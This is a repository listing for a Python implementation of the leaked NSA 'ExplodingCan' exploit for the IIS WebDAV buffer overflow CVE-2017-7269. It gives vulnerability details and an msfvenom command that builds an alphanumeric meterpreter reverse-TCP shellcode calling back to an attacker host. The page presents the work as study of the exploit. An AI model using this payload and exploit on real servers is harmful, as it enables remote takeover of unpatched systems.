• Stars
    star
    258
  • Rank 158,189 (Top 4 %)
  • Language
    Python
  • Created almost 7 years ago
  • Updated almost 7 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

An implementation of NSA's ExplodingCan exploit in Python

ExplodingCan

An implementation of ExplodingCan's exploit extracted from FuzzBunch, the "Metasploit" of the NSA.

exploit

Details

  • Vulnerability: Microsoft IIS WebDav 'ScStoragePathFromUrl' Remote Buffer Overflow
  • CVE: CVE-2017-7269
  • Disclosure date: March 31 2017
  • Affected product: Microsoft Windows Server 2003 R2 SP2 x86

Why?

Months ago I needed to study this exploit, and finally I implemented it in python.

Shellcode

The shellcode must be in alphanumeric format due to the limitations of the bug. For example we can use msfvenom (metasploit) with the alpha_mixed encoder.

$ msfvenom -p windows/meterpreter/reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=172.16.20.1 LPORT=4444 >shellcode

Links